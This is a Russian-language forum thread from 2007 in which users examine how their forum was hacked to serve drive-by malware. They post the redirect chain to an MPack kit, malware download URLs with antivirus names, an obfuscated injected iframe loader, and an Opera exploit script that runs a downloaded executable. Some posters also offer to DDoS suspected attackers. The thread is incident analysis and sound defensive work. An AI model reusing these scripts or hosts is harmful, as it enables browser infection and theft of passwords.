Интересно что же было с форумом в 27.09.07 после полуночи! Вместо html-кода был обычный двоичный беспредел...

Это просто выдался gzip в чистом виде

Вот что мне выдало при попытке залогиниться:
nUnTnanonVnMninynIndnVnUnSn8n6nDnpnBnjnLnYnanUnjnO nMn6nKnxnJntnWnNnJncnxnBnYnanUnjnUnCnPnKnxntnxnmnG nlnXnKnxn9nhnRnanVn3ntnonOnznanJnJnSnOnVn3nznonMnU n6nxnBnYnanUnjnVnfnynKnxnrnenVncnznrnxnBnSnWnDnRnM nOn9ncn3n8nVnonOnMnMn7nSn3nonSn8nRn3nsJnnWnDnOnMn6 nHnxnKnxnHnUnCnPnpnjnKnK
что ЭТО такое?

С[B]оветую всем с фаерфоксом до 2.0.0.6 без плагинов - ну кроме noscript , шестым ие с плагинами quicktime,winzip,flash,yahoo,и оперой до 9.22 обновиться и поменять пароли :)

и оперой до 9.22
включительно?

ГЕМА а что такое gzip ???

ru.wikipedia.org/wiki/Gzip
тупаки?
Тупак Шакур

Там модицифированный mpack , сплоита под firefox + quicktime нету

Когда заходил по http ->
Что то типа ддоса, спуф днс и редирект на http://dodo32.org/505/Xp//file.php?q=o9 там трой-даунлоадер, а затем
по порядку:
redirect to

http://dodo32.org/505/Xp/ (MPack)

download

http://dodo32.org/505/Xp/file.php (Avira = TR/PSW.LDPinch.TAW.334)

who download

http://dodo32.org/505/l32/0.jpg?0 ->TR/Crypt.XPACK.Gen
http://dodo32.org/505/l32/0.jpg?1 ->TR/Dldr.Small.emg.31
http://dodo32.org/505/l32/0.jpg?2 (404)
http://dodo32.org/505/l32/0.jpg?3 ->WORM/Wigon.AB
http://dodo32.org/505/l32/0.jpg?4 ->WORM/Zhelatin.Gen
http://dodo32.org/505/l32/0.jpg?5 (404)
http://dodo32.org/505/l32/0.jpg?6 (404)
http://dodo32.org/505/l32/0.jpg?7 (404)
http://dodo32.org/505/l32/0.jpg?8 (404)
http://dodo32.org/505/l32/0.jpg?9 (404)

0.jpg?1 download

http://81.95.149.235/load/206.exe ->not detect
http://81.95.149.235/load/m.exe ->TR/PSW.LdPinch.bdr.58
http://81.95.149.235/load/d.exe ->TR/Crypt.FKM.Gen

0.jpg?4 download
http://mediacount.net/pic/search.jpg
http://mediacount.net/pic/winlogon.jpg
http://mediacount.net/pic/tibs.jpg
http://mediacount.net/pic/tool.jpg
http://mediacount.net/pic/proxy.jpg

http://mediacount.net/pictures5/zgame1
http://mediacount.net/pictures5/zgame2
http://mediacount.net/pictures5/zgame3
http://mediacount.net/pictures5/zgame4
http://mediacount.net/pictures5/zgame5

http://mediacount.net/pictures1/ztool1
http://mediacount.net/pictures1/ztool2
http://mediacount.net/pictures1/ztool3
http://mediacount.net/pictures1/ztool4

etc.

whois:
Found 0 websites with the IP 81.95.149.10

role: RBusiness Network Registry
address: RBusiness Network
address: The Century Tower Building
address: Ricardo J. Alfari Avenue
address: Panama City
address: Republic of Panama

тут тоже немного инфы по dodo32.org http://umaxforum.com/topic/9/23671/90/

ЗЫ
Достать бы оунера... :mad:

Там модицифированный mpack
где там?

Точно хек (учитывается браузер??):
<SCRIPT>function ubi(grS,Cey){ var jsw=new Date(), rKa= new Date(); rKa.setTime(jsw.getTime()+86400000); document.cookie = grS+"="+escape(Cey)+";expires="+rKa.toGMTString(); }var cog='s1fVsm';var rbq='1',CLD='update1.classictel.org';var tjM='/html/';if(document.cookie.indexOf(cog+'='+rbq) ==-1){var dlh=document.location.host;var avS= 'ht'+'tp:'+'//'+( dlh != ''?'':eCI()) + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')+'.'+eCI() +'.' + CLD+tjM;var GdK=document.createElement('iframe');GdK.setAttrib ute ('src', avS);GdK.height=1;GdK.width=2;GdK.frameBorder = 0; try{ document.body.appendChild ( GdK); ubi(cog, rbq );} catch(e) {document.write ('<html><body></body></html>'); document.body.appendChild ( GdK);ubi ( cog,rbq) ;} }function eCI(){ var zZS=24;var NTe="01234567890abcdef",EYy=""; for(Uzd=0; Uzd < zZS; Uzd++) EYy+= NTe.substr(Math.?oor(Math.random()*NTe.length),1,1 ); return EYy; }</SCRIPT>
Как видно, адрес - _http://update1.classictel.org/html/
По этому адресу происходит переадресация на _http://dodo32.org/505/Xp/, где находится следующее: <script> blank_iframe = document.createElement('iframe'); blank_iframe.src = 'about:blank'; blank_iframe.setAttribute('id', 'blank_iframe_window'); blank_iframe.setAttribute('style', 'display:none'); document.appendChild(blank_iframe); blank_iframe_window.eval ("config_iframe = document.createElement('iframe');\ config_iframe.setAttribute('id', 'config_iframe_window');\ config_iframe.src = 'opera:config';\ document.appendChild(config_iframe);\ app_iframe = document.createElement('script');\ cache_iframe = document.createElement('iframe');\ app_iframe.src = 'http://dodo32.org/505/Xp//file.php?q=o9';\ app_iframe.onload = function ()\ {\ cache_iframe.src = 'opera:cache';\ cache_iframe.onload = function ()\ {\ cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\ var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe.src.toUpperCase(), '');\ filename = cache.match(re);\ config_iframe_window.eval\ (\"\ opera.setPreference('Network','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\ app_link = document.createElement('a');\ app_link.setAttribute('href', 'tn3270://nothing');\ app_link.click();\ setTimeout(function () {opera.setPreference('Network','TN3270 App','telnet.exe')},1000);\ \");\ };\ document.appendChild(cache_iframe);\ };\ document.appendChild(app_iframe);"); </script>Данный код, вероятно, должен сопоставить протоколу "tn3270:" приложение telnet.exe и скачать некий file.exe (Trojan-Downloader.Win32.Small.ert) отсюда: _http://dodo32.org/505/Xp//file.php?q=o9

Да не эт гонзо гей,я даже знаю кого надо поддосить,чтобы успокоились.

хорошо что я бухал.
Синька спасет мир)))

ждёмс видео...думаю захотят похвалится...
нечем там хвалиться...

интересно узнать, что за бага используеться=\ и как от нее закрыться... сегодня у меня на форуме началась та же херня.. те же файлы, те же хосты..
я даже знаю кого надо поддосить,чтобы успокоились.
поделись соображениями..

Да не эт гонзо гей,я даже знаю кого надо поддосить,чтобы успокоились.
Скажи кого.
Могу реализовать =)
гонзо это который с winet ?

хек... из серии сплойтов с coco32 и bobo32?

хорошо я вчера лопатил.... спасся =
а трухекерам этим не помешало бы на пальцах объяснить что нехорошо в кибервойны играть